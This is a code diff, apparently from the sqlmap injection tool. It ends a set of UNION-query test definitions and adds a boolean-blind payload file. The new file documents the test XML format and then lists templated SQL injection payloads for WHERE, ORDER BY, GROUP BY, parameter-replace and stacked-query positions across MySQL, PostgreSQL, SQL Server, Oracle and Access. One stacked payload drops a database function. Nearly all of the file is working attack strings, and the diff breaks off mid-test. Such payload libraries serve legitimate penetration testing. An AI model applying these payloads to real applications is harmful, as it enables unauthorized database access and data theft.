-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-    <test>
-        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
-        <stype>3</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-    <!-- End of UNION query tests -->
-</root>
diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml
new file mode 100644
index 000000000..34cf5f2bc
--- /dev/null
+++ b/xml/payloads/01_boolean_blind.xml
@@ -0,0 +1,671 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+Tag: <test>
+    SQL injection test definition.
+
+    Sub-tag: <title>
+        Title of the test.
+
+    Sub-tag: <stype>
+        SQL injection family type.
+
+        Valid values:
+            1: Boolean-based blind SQL injection
+            2: Error-based queries SQL injection
+            3: UNION query SQL injection
+            4: Stacked queries SQL injection
+            5: Time-based blind SQL injection
+            6: Inline queries SQL injection
+
+    Sub-tag: <level>
+        From which level check for this test.
+
+        Valid values:
+            1: Always (<100 requests)
+            2: Try a bit harder (100-200 requests)
+            3: Good number of requests (200-500 requests)
+            4: Extensive test (500-1000 requests)
+            5: You have plenty of time (>1000 requests)
+
+    Sub-tag: <risk>
+        Likelihood of a payload to damage the data integrity.
+
+        Valid values:
+            0: No risk
+            1: Low risk
+            2: Medium risk
+            3: High risk
+
+    Sub-tag: <clause>
+        In which clause the payload can work.
+
+        NOTE: for instance, there are some payload that do not have to be
+        tested as soon as it has been identified whether or not the
+        injection is within a WHERE clause condition.
+
+        Valid values:
+            0: Always
+            1: WHERE / HAVING
+            2: GROUP BY
+            3: ORDER BY
+            4: LIMIT
+            5: OFFSET
+            6: TOP
+            7: Table name
+            8: Column name
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <where>
+        Where to add our '<prefix> <payload><comment> <suffix>' string.
+
+        Valid values:
+            1: Append the string to the parameter original value
+            2: Replace the parameter original value with a negative random
+               integer value and append our string
+            3: Replace the parameter original value with our string
+
+    Sub-tag: <vector>
+        The payload that will be used to exploit the injection point.
+
+    Sub-tag: <request>
+        What to inject for this test.
+
+        Sub-tag: <payload>
+            The payload to test for.
+
+        Sub-tag: <comment>
+            Comment to append to the payload, before the suffix.
+
+        Sub-tag: <char>
+            Character to use to bruteforce number of columns in UNION
+            query SQL injection tests.
+
+        Sub-tag: <columns>
+            Range of columns to test for in UNION query SQL injection
+            tests.
+
+    Sub-tag: <response>
+        How to identify if the injected payload succeeded.
+
+        Sub-tag: <comparison>
+            Perform a request with this string as the payload and compare
+            the response with the <payload> response. Apply the comparison
+            algorithm.
+
+            NOTE: useful to test for boolean-based blind SQL injections.
+
+        Sub-tag: <grep>
+            Regular expression to grep for in the response body.
+
+            NOTE: useful to test for error-based SQL injection.
+
+        Sub-tag: <time>
+            Time in seconds to wait before the response is returned.
+
+            NOTE: useful to test for time-based blind and stacked queries
+            SQL injections.
+
+        Sub-tag: <union>
+            Calls unionTest() function.
+
+            NOTE: useful to test for UNION query (inband) SQL injection.
+
+    Sub-tag: <details>
+        Which details can be infered if the payload succeed.
+
+        Sub-tags: <dbms>
+            What is the database management system (e.g. MySQL).
+
+        Sub-tags: <dbms_version>
+            What is the database management system version (e.g. 5.0.51).
+
+        Sub-tags: <os>
+            What is the database management system underlying operating
+            system.
+
+    <test>
+        <title></title>
+        <stype></stype>
+        <level></level>
+        <risk></risk>
+        <clause></clause>
+        <where></where>
+        <vector></vector>
+        <request>
+            <payload></payload>
+            <comment></comment>
+            <char></char>
+            <columns></columns>
+        </request>
+        <response>
+            <comparison></comparison>
+            <grep></grep>
+            <time></time>
+            <union></union>
+        </response>
+        <details>
+            <dbms></dbms>
+            <dbms_version></dbms_version>
+            <os></os>
+        </details>
+    </test>
+-->
+
+<root>
+    <!-- Boolean-based blind tests - WHERE/HAVING clause -->
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND [INFERENCE]</vector>
+        <request>
+            <payload>AND [RANDNUM]=[RANDNUM]</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR ([INFERENCE])</vector>
+        <request>
+            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
+        </request>
+        <response>
+            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR ([INFERENCE])</vector>
+        <request>
+            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1</clause>
+        <where>2</where>
+        <vector>OR ([INFERENCE])</vector>
+        <request>
+            <payload>OR ([RANDNUM]=[RANDNUM])</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
+        <request>
+            <payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
+        </request>
+        <response>
+            <comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+    <!-- End of boolean-based blind tests - WHERE or HAVING clause -->
+
+    <!-- Boolean-based blind tests - Parameter replace -->
+    <test>
+        <title>Generic boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
+        <request>
+            <payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
+        </request>
+        <response>
+            <comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>ELT([INFERENCE],[ORIGVALUE])</vector>
+        <request>
+            <payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
+        </request>
+        <response>
+            <comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>([INFERENCE])*[ORIGVALUE]</vector>
+        <request>
+            <payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
+        </request>
+        <response>
+            <comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+        <request>
+            <payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
+        <request>
+            <payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
+        </request>
+        <response>
+            <comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+        <request>
+            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+        </request>
+        <response>
+            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+    <!-- End of boolean-based blind tests - Parameter replace -->
+
+    <!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
+    <test>
+        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
+        <request>
+            <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
+        </request>
+        <response>
+            <comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
+        </response>
+        <details>
+            <dbms>Microsoft Access</dbms>
+        </details>
+    </test>
+    <!-- TODO: check against SAP MaxDB -->
+    <!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
+
+    <!-- Stacked conditional-error blind queries tests -->
+    <test>
+        <title>PostgreSQL stacked conditional-error blind queries</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>2</where>
+        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
+        <request>
+            <payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
+        <request>
+            <payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
+        </response>
